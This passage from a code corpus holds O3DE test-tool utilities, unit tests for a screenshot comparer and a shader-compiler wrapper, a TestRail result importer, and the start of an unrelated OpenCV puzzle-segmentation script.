asset in diff["expected"]: logger.info(" " + asset) # True ONLY IF both diffs are empty return not diff["actual"] and not diff["expected"] def delete_MoveOutput_folders(search_path: List[str] or str) -> None: """ Deletes any directories that start with 'MoveOutput' in specified search location :param search_path: either a single path or a list of paths to search inside for MoveOutput folders :return: None """ delete_list = [] def search_one_path(search_location): nonlocal delete_list for file_or_folder in os.listdir(search_location): file_or_folder_path = os.path.join(search_location, file_or_folder) if os.path.isdir(file_or_folder_path) and file_or_folder.startswith("MoveOutput"): delete_list.append(file_or_folder_path) if isinstance(search_path, List): for single_path in search_path: search_one_path(single_path) else: search_one_path(search_path) fs.delete(delete_list, False, True) def find_queries(line: str, queries_to_find: List[str or List[str]]) -> List[str or List[str]]: """ Searches for strings and/or combinations of strings within a line :param line: Line to search :param queries_to_find: List containing strings and/or lists of strings to find :return: List of strings and/or lists of strings found within the line """ queries_found = [] for query in queries_to_find: # If query is a list then find each list item as a substring within the line if isinstance(query, list): subqueries_to_find = query[:] while subqueries_to_find and subqueries_to_find[0] in line: subqueries_to_find.pop(0) if subqueries_to_find == []: queries_found.append(query) # Otherwise find query as a substring within the line elif query in line: queries_found.append(query) return queries_found def validate_log_output( log_output: List[str or List[str]], expected_queries: List[str or List[str]] = [], unexpected_queries: List[str or List[str]] = [], failure_cb: Callable = None ) -> None: """ Asserts that the log output contains all expected queries and no unexpected queries. 
:param log_output: log output of the application :param expected_queries: String or list containing strings and/or lists of strings to be found :param unexpected_queries: String or list containing strings and/or lists of strings not to be found :param failure_cb: Optional callback when log output isn't expected, useful for printing debug info :return: None """ expected_queries = [expected_queries] if isinstance(expected_queries, str) else expected_queries unexpected_queries = [unexpected_queries] if isinstance(unexpected_queries, str) else unexpected_queries unexpectedly_found = [] for line in log_output: # Remove queries expectedly found in the log from queries to expect for found_query in find_queries(line, expected_queries): expected_queries.remove(found_query) # Save unexpectedly found lines if find_queries(line, unexpected_queries): unexpectedly_found.append(line) if failure_cb and (len(unexpected_queries) > 0 or len(expected_queries) > 0): failure_cb() # Assert no unexpected lines found and all expected queries found assert unexpectedly_found == [], f"Unexpected line(s) were found in the log run: {unexpectedly_found}" assert expected_queries == [], f"Expected query(s) were not found in the log run: {expected_queries}" def validate_log_messages( log_file: str, expected_queries: str or List[str or List[str]] = [], unexpected_queries: str or List[str or List[str]] = [], ) -> None: """ Asserts that the most recent log run contains all expected queries and no unexpected queries. Queries can be strings and/or combinations of strings [[using nested lists]]. :param log_file: Path to the log file being used :param expected_queries: String or list containing strings and/or lists of strings to be found :param unexpected_queries: String or list containing strings and/or lists of strings not to be found :return: None """ # Search the log lines in the latest log run validate_log_output(APLogParser(log_file).runs[-1]["Lines"], expected_queries, unexpected_queries) def validate_relocation_report( log_file: str, expected_queries: str or List[str or List[str]] = [], unexpected_queries: str or List[str or List[str]] = [], ) -> None: """ Asserts that the relocation report section of the most recent log run contains all expected queries and no unexpected queries. Queries can be strings and/or combinations of strings [[using nested lists]]. 
:param log_file: Path to the log file being used :param expected_queries: String or list containing strings and/or lists of strings to be found :param unexpected_queries: String or list containing strings and/or lists of strings not to be found :return: None """ expected_queries = [expected_queries] if isinstance(expected_queries, str) else expected_queries unexpected_queries = [unexpected_queries] if isinstance(unexpected_queries, str) else unexpected_queries unexpectedly_found = [] in_relocation_report = False # Search the log lines which appear between opening and closing RELOCATION REPORT lines in the latest log run for line in APLogParser(log_file).runs[-1]["Lines"]: if "RELOCATION REPORT" in line: in_relocation_report = not in_relocation_report continue # Go to next log line if in_relocation_report: # Remove queries expectedly found in the relocation report from queries to expect for found_query in find_queries(line, expected_queries): expected_queries.remove(found_query) # Save unexpectedly found lines if find_queries(line, unexpected_queries): unexpectedly_found.append(line) # Assert no unexpected lines found and all expected queries found assert unexpectedly_found == [], f"Unexpected line(s) were found in the relocation report: {unexpectedly_found}" assert expected_queries == [], f"Expected query(s) were not found in the relocation report: {expected_queries}" def get_paths_from_wildcard(root_path: str, wildcard_str: str) -> List[str]: """ Convert a wildcard path into a list of existing full paths. :param root_path: Full path in which to search for matches for the wildcard string :param wildcard_str: Must contain exactly one "*", at the beginning or end, or be simply "*" :return: List of all full paths which satisfy the wildcard criteria """ rel_path_list = get_relative_file_paths(root_path) if not wildcard_str == "*": if wildcard_str.startswith("*"): rel_path_list = [item for item in rel_path_list if item.endswith(wildcard_str[1:])] elif wildcard_str.endswith("*"): rel_path_list = [item for item in rel_path_list if item.startswith(wildcard_str[0:-1])] return [os.path.join(root_path, item) for item in rel_path_list] def check_for_perforce(): command_list = ['p4', 'info'] try: p4_output = subprocess.check_output(command_list).decode('utf-8') except subprocess.CalledProcessError as e: logger.error(f"Failed to call {command_list} with error {e}") return False if not p4_output.startswith("User name:"): logger.warning(f"Perforce not found, output was {p4_output}") return False client_root_match = re.search(r"Client root: (.*)\r", p4_output) if client_root_match is None: logger.warning(f"Could not determine client root for p4 workspace. Perforce output was {p4_output}") return False else: # This requires the tests to be in the Perforce path that the tests run against. working_path = os.path.realpath(__file__).replace("\\", "/").lower() client_root = client_root_match.group(1).replace("\\", "/").lower() if not working_path.startswith(client_root): logger.error(f"""Perforce client root '{client_root}' does not contain current test directory '{working_path}'. Please run this test with a Perforce workspace that contains the test asset directory path.""") return False logger.info(f"Perforce found, output was {p4_output}") return True def get_file_hash(filePath, hashBufferSize = 65536): assert os.path.exists(filePath), f"Cannot get file hash, file at path '{filePath}' does not exist." 
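    # Hash the file in fixed-size chunks (hashBufferSize, 64 KiB by default) so large cache
    # files can be fingerprinted without loading them entirely into memory.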
sha1 = hashlib.sha1() with open(filePath, 'rb') as cacheFile: while True: data = cacheFile.read(hashBufferSize) if not data: break sha1.update(data) return sha1.hexdigest() ``` #### File: tests/unit/test_ly_process_killer.py ```python import unittest.mock as mock import pytest import ly_test_tools._internal.managers.ly_process_killer pytestmark = pytest.mark.SUITE_smoke class TestProcessKiller(object): @mock.patch('ly_test_tools.environment.process_utils.process_exists') def test_DetectLumberyardProcesses_ValidProcessesList_ReturnsDetectedProcessesList(self, mock_process_exists): mock_process_exists.side_effect = [True, False] mock_process_list = ['foo', 'bar'] under_test = ly_test_tools._internal.managers.ly_process_killer.detect_lumberyard_processes( processes_list=mock_process_list) assert under_test == ['foo'] def test_KillProcesses_ProcessesListIsNotList_RaisesLyProcessKillerException(self): with pytest.raises(ly_test_tools._internal.managers.ly_process_killer.LyProcessKillerException): ly_test_tools._internal.managers.ly_process_killer.kill_processes(processes_list={}) ``` #### File: tests/unit/test_screenshot_compare_qssim.py ```python import unittest.mock as mock import numpy as np import pytest import ly_test_tools.image.screenshot_compare_qssim as screenshot_compare pytestmark = pytest.mark.SUITE_smoke class TestScreenshotCompare(object): def test_QuaternionMatrixConj_4x3Matrix_ValidConjugate(self): given_matrix = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10 , 11, 12]]]) expected_conjugateMatrix = np.array([[[1, -2, -3, -4], [5, -6, -7, -8], [9, -10, -11, -12]]]) result_conjugateMatrix = screenshot_compare._quaternion_matrix_conj(given_matrix) assert np.array_equal(result_conjugateMatrix,expected_conjugateMatrix) def test_QuaternionMatrixDot_4x3matrix_ValidDotProduct(self): given_matrix = np.array([[[0, 0, 0, 2], [0, 0, 4, 0], [0, 0, 8, 0]]]) expected_answer = np.array([[2, 4, 8]]) result_matrix = screenshot_compare._quaternion_matrix_dot(given_matrix, given_matrix) assert np.array_equal(expected_answer,result_matrix) @mock.patch('ly_test_tools.image.screenshot_compare_qssim._quaternion_matrix_dot') def test_QuaternionMatrixNorm_DotProductUsed_AssertDotProductCalled(self, mock_matrixDotProduct): given_matrix = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) screenshot_compare._quaternion_matrix_norm(given_matrix) mock_matrixDotProduct.assert_called_once() mock_matrixDotProduct.assert_called_with(given_matrix,given_matrix) @mock.patch('ly_test_tools.image.screenshot_compare_qssim._quaternion_matrix_norm') def test_QuaternionMatrixDivide_NormCalledForSecondMatrix_AssertNormCalled(self, mock_matrixNorm): matrix_a = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) matrix_b = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) mock_matrixNorm.return_value = np.array([[1,2,3]]) screenshot_compare._quaternion_matrix_div(matrix_a, matrix_b) mock_matrixNorm.assert_called_with(matrix_b) @mock.patch('numpy.divide',mock.MagicMock()) @mock.patch('ly_test_tools.image.screenshot_compare_qssim._quaternion_matrix_mult',mock.MagicMock()) @mock.patch('ly_test_tools.image.screenshot_compare_qssim._quaternion_matrix_conj') def test_QuaternionMatrixDivide_ConjugateCalledForSecondMatrix_AssertConjugateCalled(self, mock_matrixConjugate): matrix_a = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) matrix_b = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) screenshot_compare._quaternion_matrix_div(matrix_a, matrix_b) 
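        # _quaternion_matrix_div is expected to build q_a * conj(q_b) scaled by the norm of
        # q_b, so the conjugate helper should have been invoked with the second matrix.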
mock_matrixConjugate.assert_called_with(matrix_b) @mock.patch('numpy.divide',mock.MagicMock()) @mock.patch('ly_test_tools.image.screenshot_compare_qssim._quaternion_matrix_conj') @mock.patch('ly_test_tools.image.screenshot_compare_qssim._quaternion_matrix_mult') def test_QuaternionMatrixDivide_MultiplyCalledForMatAConjB_AssertMultiplyCalled(self, mock_matrixMultiply,mock_matrixConjugate): matrix_a = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) matrix_b = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) mock_conjugate_return = np.array([[[1, -2, -3, -4], [5, -6, -7, -8], [9, -10, -11, -12]]]) mock_matrixConjugate.return_value = mock_conjugate_return screenshot_compare._quaternion_matrix_div(matrix_a, matrix_b) mock_matrixMultiply.assert_called_with(matrix_a,mock_conjugate_return) @mock.patch('imageio.imread') @mock.patch('imageio.imwrite',mock.MagicMock()) def test_qssim_CheckSameImage_ShouldReturnOne(self, mock_imageRead): matrix_a = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9]]]) matrix_b = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9]]]) mock_imageRead.side_effect = [matrix_a,matrix_b] assert screenshot_compare.qssim('test1.jpg', 'test2.jpg') == 1 @mock.patch('imageio.imread') @mock.patch('imageio.imwrite',mock.MagicMock()) def test_qssim_CheckAlmostSameImage_GreaterThanHalf(self, mock_imageRead): matrix_a = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9]]]) matrix_b = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 19]]]) mock_imageRead.side_effect = [matrix_a,matrix_b] assert screenshot_compare.qssim('test1.jpg', 'test2.jpg') > 0.5 @mock.patch('imageio.imread') @mock.patch('imageio.imwrite',mock.MagicMock()) def test_qssim_CheckDifferentImage_ShouldNotReturnOne(self, mock_imageRead): matrix_a = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9]]]) matrix_b = np.array([[[11, 12, 13], [14, 15, 16], [17, 18, 19]]]) mock_imageRead.side_effect = [matrix_a,matrix_b] assert screenshot_compare.qssim('test1.jpg', 'test2.jpg') != 1 @mock.patch('imageio.imread') @mock.patch('imageio.imwrite') def test_qssim_CheckDiffImageSaved_AssertImSave(self, mock_imageSave, mock_imageRead): matrix_a = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9]]]) matrix_b = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9]]]) mock_imageRead.side_effect = [matrix_a,matrix_b] screenshot_compare.qssim('test1.jpg', 'test2.jpg') mock_imageSave.assert_called() ``` #### File: tests/unit/test_shader_compiler.py ```python import unittest.mock as mock import pytest import ly_test_tools._internal.managers.workspace import ly_test_tools._internal.managers.abstract_resource_locator import ly_test_tools.o3de.shader_compiler pytestmark = pytest.mark.SUITE_smoke mock_initial_path = "mock_initial_path" mock_engine_root = "mock_engine_root" mock_dev_path = "mock_dev_path" mock_build_directory = 'mock_build_directory' mock_project = 'mock_project' @mock.patch('ly_test_tools._internal.managers.abstract_resource_locator.os.path.abspath', mock.MagicMock(return_value=mock_initial_path)) @mock.patch('ly_test_tools._internal.managers.abstract_resource_locator._find_engine_root', mock.MagicMock(return_value=(mock_engine_root, mock_dev_path))) @mock.patch('ly_test_tools.o3de.asset_processor.logger.warning', mock.MagicMock()) class TestShaderCompiler(object): @mock.patch('ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager') def test_Init_MockWorkspace_MembersSetCorrectly(self, mock_workspace): under_test = ly_test_tools.o3de.shader_compiler.ShaderCompiler(mock_workspace) assert under_test._workspace == mock_workspace assert under_test._sc_proc is 
None @mock.patch('ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager') @mock.patch('subprocess.Popen') @mock.patch('ly_test_tools.WINDOWS', True) def test_Start_NoneRunning_ProcessStarted(self, mock_popen, mock_workspace): mock_shader_compiler_path = 'mock_shader_compiler_path' mock_workspace.paths.get_shader_compiler_path.return_value = mock_shader_compiler_path mock_popen.return_value = mock.MagicMock() under_test = ly_test_tools.o3de.shader_compiler.ShaderCompiler(mock_workspace) assert under_test._sc_proc is None under_test.start() assert under_test._sc_proc is not None mock_popen.assert_called_once_with(['RunAs', '/trustlevel:0x20000', mock_shader_compiler_path]) @mock.patch('ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager') @mock.patch('subprocess.Popen') @mock.patch('ly_test_tools.o3de.shader_compiler.MAC', True) def test_Start_NotImplemented_ErrorRaised(self, mock_popen, mock_workspace): under_test = ly_test_tools.o3de.shader_compiler.ShaderCompiler(mock_workspace) assert under_test._sc_proc is None with pytest.raises(NotImplementedError): under_test.start() assert under_test._sc_proc is None mock_popen.assert_not_called() @mock.patch('ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager') @mock.patch('subprocess.Popen') @mock.patch('ly_test_tools.o3de.shader_compiler.logger.info') @mock.patch('ly_test_tools.o3de.shader_compiler.MAC', True) def test_Start_AlreadyRunning_ProcessNotChanged(self, mock_logger, mock_popen, mock_workspace): mock_shader_compiler_path = 'mock_shader_compiler_path' mock_workspace.paths.get_shader_compiler_path.return_value = mock_shader_compiler_path mock_popen.return_value = mock.MagicMock() under_test = ly_test_tools.o3de.shader_compiler.ShaderCompiler(mock_workspace) under_test._sc_proc = 'foo' under_test.start() assert under_test._sc_proc is not None mock_popen.assert_not_called() mock_logger.assert_called_once_with( 'Attempted to start shader compiler at the path: {0}, ' 'but we already have one open!'.format(mock_shader_compiler_path)) @mock.patch('ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager') @mock.patch('ly_test_tools.o3de.shader_compiler.process_utils.kill_processes_started_from') @mock.patch('ly_test_tools.o3de.shader_compiler.waiter.wait_for') def test_Stop_AlreadyRunning_ProcessStopped(self, mock_wait, mock_kill, mock_workspace): mock_shader_compiler_path = 'mock_shader_compiler_path' mock_workspace.paths.get_shader_compiler_path.return_value = mock_shader_compiler_path under_test = ly_test_tools.o3de.shader_compiler.ShaderCompiler(mock_workspace) under_test._sc_proc = 'foo' under_test.stop() assert under_test._sc_proc is None mock_kill.assert_called_once_with(mock_shader_compiler_path) mock_wait.assert_called_once() @mock.patch('ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager') @mock.patch('ly_test_tools.o3de.shader_compiler.process_utils.kill_processes_started_from') @mock.patch('ly_test_tools.o3de.shader_compiler.waiter.wait_for') @mock.patch('ly_test_tools.o3de.shader_compiler.logger.info') def test_Stop_NoneRunning_MessageLogged(self, mock_logger, mock_wait, mock_kill, mock_workspace): mock_shader_compiler_path = 'mock_shader_compiler_path' mock_workspace.paths.get_shader_compiler_path.return_value = mock_shader_compiler_path under_test = ly_test_tools.o3de.shader_compiler.ShaderCompiler(mock_workspace) under_test._sc_proc = None under_test.stop() assert under_test._sc_proc is None mock_kill.assert_not_called() mock_wait.assert_not_called() 
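        # With no shader compiler process tracked, stop() should do nothing beyond logging an
        # informational message; neither the kill helper nor the waiter may be invoked.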
mock_logger.assert_called_once_with( 'Attempted to stop shader compiler at the path: {0}, ' 'but we do not have any open!'.format(mock_shader_compiler_path)) ``` #### File: lib/testrail_importer/testrail_importer.py ```python import argparse import datetime import logging import os import getpass import sys try: # py2 import testrail_tools.testrail_connection as testrail_connection import testrail_tools.testrail_report_converter as testrail_report_converter import testrail_tools.testrail_api_connector as testrail_api_connector except ImportError: # py3 import lib.testrail_importer.testrail_tools.testrail_connection as testrail_connection import lib.testrail_importer.testrail_tools.testrail_report_converter as testrail_report_converter import lib.testrail_importer.testrail_tools.testrail_api_connector as testrail_api_connector log = logging.getLogger(__name__) class TestRailImporterError(Exception): """Raised when an expected error occurs for the TestRailImporter() class.""" pass class TestRailImporter(object): """ Parses a jUnitXML file and pushes the report results to TestRail. """ def __init__(self): self._cli_args = self.cli_args() def __filter_test_cases(self, testrun_results): """ Takes a list of pass/fail test results with multiple test case IDs and returns a list of pass/fail test results for each test case ID. :param testrun_results: list containing test run pass/fail results with test case IDs all grouped together :return: list containing a pass/fail result for each test case ID """ updated_test_results = [] for test_result in testrun_results: filtered_result = [] case_ids = test_result.get('case_ids') if case_ids: filtered_result = self.__filter_test_case_ids(test_result) updated_test_results.extend(filtered_result) test_result.pop('case_ids') log.info('TestRailImporter: Test Case ID filtering ' 'finished: {}'.format(updated_test_results)) return updated_test_results def __filter_test_case_ids(self, test_result): """ Takes a list of test case IDs and generates 1 test result per test case ID, appends it to a list, then returns the list. :param test_result: dict containing test result values :return: list of test result dicts, 1 test result dict per test case ID or None if no test case IDs found. """ result_for_each_id = [] case_ids = test_result.get('case_ids') if case_ids: for case_id in case_ids: new_result = test_result.copy() new_result['case_id'] = case_id result_for_each_id.append(new_result) return result_for_each_id def cli_args(self): """ Parse for CLI args to use with the TestRailImporter. :return: argparse.ArgumentParser containing all CLI args passed. """ parser = argparse.ArgumentParser(description="TestRail XML test result importer.") parser.add_argument("--testrail-xml", nargs='?', required=True, help="REQUIRED: Path to jUnitXML file.") parser.add_argument("--testrail-url", nargs='?', required=True, help="REQUIRED: URL of the TestRail site to use.") parser.add_argument("--testrail-user", nargs='?', required=True, help="REQUIRED: The user to log in as on TestRail for API calls.") parser.add_argument("--testrail-project-id", required=True, help="ID for the TestRail project") parser.add_argument("--testrail-password", help="TestRail password for the --testrail-user arg passed." "REQUIRED: If not manually executing the script (i.e. automation)." 
"NOTE: Be sure to use a secured method of passing this parameter if you use it.") parser.add_argument("--testrun-name", help="Name of the test run", default="Automated TestRail Report") parser.add_argument("--logs-folder", help="Sub-folder within ~/TestRailImporter/ to store .log " "files for python logging.", default='reports') parser.add_argument("--testrun-id", help="ID for the TestRail test run. " "This value takes priority over all other identifiers for a test run. " "If left blank, the TestRailImporter will create a new test run in the " "project ID specified (and suite ID if required).") parser.add_argument("--testrail-suite-id", help="Suite ID for the TestRail project: required if no '--testrun-id' CLI arg " "is passed and a project has suites. Not required if a project lacks suites.") args = parser.parse_args() return args def project_suite_check(self, client, project_id): """ Sends a request to the TestRail API to determine if a project has suites or not. Projects with suites need a suite ID specified in the request to add a new test run. :param client: TestRailConnection client object for communicating with the TestRail API. :param project_id: string representing the ID for a TestRail project to target for the suites check. :return: True if the project has suites and a '--testrail-suite-id' CLI arg value, otherwise raise a TestRailImporterError exception. """ has_multiple_suites = None project_suites = client.get_suites(project_id) if project_suites: has_multiple_suites = len(project_suites) > 1 if has_multiple_suites and not self._cli_args.testrail_suite_id: if self._cli_args.testrun_id: return True raise TestRailImporterError( "TestRailImporter requires the '--testrail-suite-id' CLI arg if the project has more than 1 suite and " "no '--testrun-id' CLI arg is passed.") return True def start_log(self, logs_folder): """ Configures the root Logger for all modules with log objects to inherit from. :param logs_folder: string representing the logs folder name, which is passed in by the "--logs-folder=" CLI arg and created inside of the ~/TestRailImporter/ directory. """ # Logging format variables. timestamp_format = '%Y-%m-%dT%H-%M-%S-%f' # ISO with colon and period replaced to dash log_format_string = '%(asctime)-15s %(message)s' now = datetime.datetime.now().strftime(timestamp_format) # Logging file & folder path variables. full_path = os.path.realpath(__file__) log_directory = os.path.join(os.path.dirname(full_path), '..', '..', logs_folder) log_filename = "testrail_importer_log_{}.log".format(now) if not os.path.isdir(log_directory): log.warn('TestRailImporter: Logging directory not created. ' 'Creating in: {}'.format(log_directory)) os.makedirs(log_directory) full_log_file_path = os.path.join(log_directory, log_filename) # Stream handler for console output. stream_handler = logging.StreamHandler() stream_handler.setFormatter(logging.Formatter(log_format_string)) stream_handler.setLevel(logging.INFO) # File handler for saving to a log file. file_handler = logging.FileHandler(full_log_file_path) file_handler.setFormatter(logging.Formatter(log_format_string)) file_handler.setLevel(logging.INFO) # Root logger other module-level loggers will inherit from. root_logger = logging.getLogger('') root_logger.setLevel(logging.INFO) root_logger.addHandler(stream_handler) root_logger.addHandler(file_handler) def testrail_client(self, url, user, password): """ TestRailConnection object for making API requests to the TestRail API. :param url: string representing the TestRail URL to target. 
i.e.: 'https://testrail.yourspecialurl.com/' :param user: string representing the TestRail user to access the API with. :param password: string representing the password to go with the TestRail user parameter. :return testrail_connection.TestRailConnection client. """ client = testrail_connection.TestRailConnection( url=url, user=user, password=password ) return client def testrail_converter(self): """ TestRailReporterConverter object for converting jUnitXML reports into a TestRail readable format for importing test results. :return: testrail_report_converter.TestRailReportConverter() """ return testrail_report_converter.TestRailReportConverter() def main(self): """ Main executor for converting and pushing .xml test results to TestRail using TestRailImporter. :return: None """ # Configure logging & start root logger. self.start_log(self._cli_args.logs_folder) # Sort out the TestRail account password first, for security reasons. password = self._cli_args.testrail_password if not password: if not sys.stdin.isatty(): raise TestRailImporterError( "No --testrail-password CLI arg passed and no TTY input detected. " "Please pass the required CLI arg or use a TTY console/terminal for manual input with " "@echo off enabled.") log.warn('--testrail-password CLI arg not passed, but TTY input detected.') password = getpass.getpass( "Enter the TestRail Password for TestRail account {}: ".format(self._cli_args.testrail_user)) # Connect the TestRailImporter to the TestRail API using TestRailConnection object. client = self.testrail_client(url=self._cli_args.testrail_url, user=self._cli_args.testrail_user, password=password) # Check if '--testrail-suite-id' is required. self.project_suite_check(client=client, project_id=self._cli_args.testrail_project_id) # Convert the jUnitXML report for TestRail converted_test_case_ids = [] testrun_results = dict() test_report_results = self.testrail_converter().xml_to_list_of_dicts( self._cli_args.testrail_xml) # Determine which XML test case IDs exist on the targeted TestRail project. for result in test_report_results: converted_test_case_ids.extend(result.get('case_ids')) test_case_ids = set(converted_test_case_ids) testrail_test_cases = client.get_valid_test_case_ids(test_case_ids) # Create the test run & add tests to the test run. if not self._cli_args.testrun_id: self._cli_args.testrun_id = client.create_run(project_id=self._cli_args.testrail_project_id, suite_id=self._cli_args.testrail_suite_id, testrun_name=self._cli_args.testrun_name, case_ids=testrail_test_cases) else: client.add_tests(testrun_id=self._cli_args.testrun_id, case_ids=testrail_test_cases) tests_added_to_run = client.get_tests(self._cli_args.testrun_id) testrun_results['results'] = self.__filter_test_cases(test_report_results) testrun_results['testrun_id'] = self._cli_args.testrun_id # Parse for TestRail test case IDs detected & XML test case IDs collected. testrail_case_ids_detected = [] xml_case_ids_collected = [] if tests_added_to_run: for test in tests_added_to_run: testrail_case_ids_detected.append(test['case_id']) for result in testrun_results['results']: xml_case_ids_collected.append(result['case_id']) # Post test results to the created test run. log.info('TestRailImporter: Posting results to TestRail: {}'.format(testrun_results)) try: client.post_test_results(testrun_results) except testrail_api_connector.TestRailAPIError: # Report on mismatched XML & TestRail IDs. 
            log.warning(
                'TestRailImporter: For test run ID "{}" - collected XML test case IDs: "{}" - '
                '& detected TestRail test case IDs: "{}"\n'
                'If you fail to see results on TestRail, it is probably due to these ID mismatches.'.format(
                    self._cli_args.testrun_id, xml_case_ids_collected, testrail_case_ids_detected))


if __name__ == '__main__':
    TestRailImporter().main()
```
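The per-case-ID fan-out performed by `__filter_test_cases` and `__filter_test_case_ids` is easiest to see on concrete data. The sketch below is a compressed, standalone rendition of that step; the sample result dicts are invented and only mimic the shape produced by the XML converter.

```python
# Standalone, compressed rendition of the per-case-ID fan-out done by
# TestRailImporter.__filter_test_cases; the sample dicts are invented and only
# mimic the shape of the converter's output.
def fan_out(testrun_results):
    expanded = []
    for result in testrun_results:
        case_ids = result.pop('case_ids', []) or []
        for case_id in case_ids:
            # one result row per TestRail case ID, carrying the original fields
            expanded.append(dict(result, case_id=case_id))
    return expanded


if __name__ == '__main__':
    sample = [
        {'status_id': 1, 'comment': 'passed', 'case_ids': [101, 102]},
        {'status_id': 5, 'comment': 'failed', 'case_ids': [103]},
    ]
    for row in fan_out(sample):
        print(row)  # three rows in total, one per TestRail case ID
```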
{ "source": "aaasenin/puzzles-segmentation", "score": 3 }
#### File: aaasenin/puzzles-segmentation/code.py
```python
from skimage import io
import numpy as np
import matplotlib.pyplot as plt
import cv2  # use old opencv, the latest version lacks SIFT, e.g.: pip install opencv-python==3.4.2.17
from PIL import Image, ImageEnhance

image_dir = 'your image directory'
train_image_dir = 'train image directory'


def is_outlier(points, thresh=0.1):
    maximum = np.max(points)
    return points / maximum < thresh


image = io.imread(image_dir)

# image preprocessing for fore/background building
image = cv2.GaussianBlur(image, (351, 351), cv2.BORDER_DEFAULT)
clahe = cv2.createCLAHE(clipLimit=1.5, tileGridSize=(2, 2))
lab = cv2.cvtColor(image, cv2.COLOR_BGR2LAB)
l, a, b = cv2.split(lab)
l2 = clahe.apply(l)  # apply CLAHE to the L-channel
lab = cv2.merge((l2, a, b))
image = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]

# building fore/background markers
dist = cv2.distanceTransform(thresh, cv2.DIST_L2, 3)
cv2.normalize(dist, dist, 0, 1.0, cv2.NORM_MINMAX)
_, dist = cv2.threshold(dist, 0.25, 1.0, cv2.THRESH_BINARY)
dist = np.array(dist).astype(np.uint8)

nlabels, labels, stats, centroids = cv2.connectedComponentsWithStats(dist, None, None, None, 8, cv2.CV_32S)
areas = stats[1:, cv2.CC_STAT_AREA]
result = np.zeros((labels.shape), np.uint8)
for i in range(0, nlabels - 1):
    if areas[i] >= 1000:
        result[labels == i + 1] = 255

kernel = np.ones((20, 20), np.uint8)
result = cv2.dilate(result, kernel, iterations=3)
kernel = np.ones((5, 5), np.uint8)
result = cv2.erode(result, kernel, iterations=15)
kernel = np.ones((20, 20), np.uint8)
background = cv2.dilate(result, kernel, iterations=20)

nlabels, labels, stats, centroids = cv2.connectedComponentsWithStats(result, None, None, None, 8, cv2.CV_32S)
areas = stats[1:, cv2.CC_STAT_AREA]
outliers_mask = is_outlier(areas, thresh=0.1)
result = np.zeros((labels.shape), np.uint8)
for i in range(0, nlabels - 1):
    if not outliers_mask[i]:
        result[labels == i + 1] = 255

unknown = cv2.subtract(background, result)
ret, markers = cv2.connectedComponents(result)
markers = markers + 1
markers[unknown == 255] = 0

# image preprocessing for watershed
image = io.imread(image_dir)
im = Image.fromarray(image)
enhancer = ImageEnhance.Contrast(im)
enhanced_im = enhancer.enhance(3.5)
image = np.array(enhanced_im)
image = cv2.medianBlur(image, 7)

# watershed
markers = cv2.watershed(image, markers)
mask = (markers != 1).astype(np.uint8)


def crop_image(img, mask=None):
    if mask is None:
        gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        mask = (gray_img != 0).astype(np.uint8)
    x, y, w, h = cv2.boundingRect(mask)
    return (img[y : y + h + 1, x : x + w + 1, :]).astype(np.uint8)


train_image = io.imread(train_image_dir)

# train_image preprocessing
im = Image.fromarray(train_image)
enhancer = ImageEnhance.Sharpness(im)
enhanced_im = enhancer.enhance(5)
train_image = np.array(enhanced_im)
train_gray = cv2.cvtColor(train_image, cv2.COLOR_BGR2GRAY)
train_gray = (train_gray != 0).astype(np.uint8)
train_gray = cv2.medianBlur(train_gray, 5)
kernel = np.ones((5, 5), np.uint8)
train_gray = cv2.dilate(train_gray, kernel, iterations=1)

# building train_markers and train_answers
train_ret, train_markers = cv2.connectedComponents(train_gray)
train_markers = train_markers + 1
train_idxes = [1, 2, 3, 4, 5, 7, 6, 9, 8, 10, 12, 13, 14, 15, 11, 16, 18, 20, 17, 19]
train_masks = []
train_answers = ['P1B1', 'P2B2', 'P2B1', 'P1B2', 'P2B2', 'P1B2', 'P1B2', 'P0B2', 'P2B1', 'P1B2', 'P1B1', 'P3B0',
                 'P1B3', 'P3B1', 'P2B1', 'P1B3', 'P1B1', 'P2B2', 'P2B1', 'P2B1']

for comp_idx in np.unique(train_markers):
    if comp_idx != 1:
        mask = (train_markers == comp_idx).astype(np.uint8)
        bin_mask = (mask != 0).astype(np.uint8)
        train_masks.append(bin_mask)


def compare_images(idxed_image, train_image, ratio_thresh):
    # comparing images based on the number of matched SIFT key points;
    # both idxed and train images should be cropped and masked
    sift = cv2.xfeatures2d.SIFT_create(nfeatures=100000)
    kp_1, desc_1 = sift.detectAndCompute(idxed_image, None)
    kp_2, desc_2 = sift.detectAndCompute(train_image, None)
    matcher = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_FLANNBASED)
    knn_matches = matcher.knnMatch(desc_1, desc_2, 2)
    good_matches = []
    for m, n in knn_matches:
        if m.distance < ratio_thresh * n.distance:
            good_matches.append(m)

    decision_array = np.zeros(len(train_masks))
    for match in good_matches:
        x, y = kp_2[match.trainIdx].pt
        for bin_mask_idx in range(len(train_masks)):
            x_m, y_m, w_m, h_m = cv2.boundingRect(train_masks[bin_mask_idx])
            if x >= x_m and x <= x_m + w_m and y >= y_m and y <= y_m + h_m:
